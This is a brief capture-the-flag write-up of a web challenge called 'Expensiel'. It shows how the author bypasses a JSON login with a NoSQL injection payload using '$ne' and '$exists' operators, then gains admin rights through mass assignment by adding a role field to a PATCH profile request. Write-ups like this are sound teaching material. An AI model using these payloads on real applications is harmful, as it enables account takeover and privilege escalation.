Simon McCabe

Expensiel Writeup

1. Enumeration

The only real thing I had to go on was the login with a json response. I tried banner grabbing, port scanning, but nothing was standing out aside from the json response. The only thing that made any sense was some kind of NoSQL injection.

The NoSQL payload that ended up working was:

{
  "email": { "$ne": null, "$exists": true },
  "password": { "$ne": null, "$exists": true }
}
        

2. Foothold

I could now open the request in the browser via burp and navigate to the /dashboard. I was now logged in as Dana:

I went to look at the settings. The first thing that stood out to me was the "Role" of "Employee":

3. Mass Assignment

When saving the profile, it saved using a PATCH verb.

This made me think that I could try simply adding a role to the submission. So I tried this and received a response of "ok:true"

                {"name":"Dana Whitfield",
                "phone":"(503) 555-0142",
                "department":"Outreach",
                "payoutLast4":"4417",
                "role":"admin",
                "notifyEmail":true}
        

4. Root / Admin

Mass assignment seemed like the best option here and it was the right option because now I had a Administrator console available:

From the admin console, I could grab the flag:

flag: WEBVERSE{f9cccXXXXXXXXXXXXXXXXXXXXXXXXXXX}

5. Lessons / Notes

• Mass assignment can happen anywhere, not just upon registration
• This was a slightly unconvential NoSQL injection (many payloads are slightly different to this one)
• Even with very little we could do to enumerate the web application, it still resulted in a NoSQL & Mass Assignment to account takeover.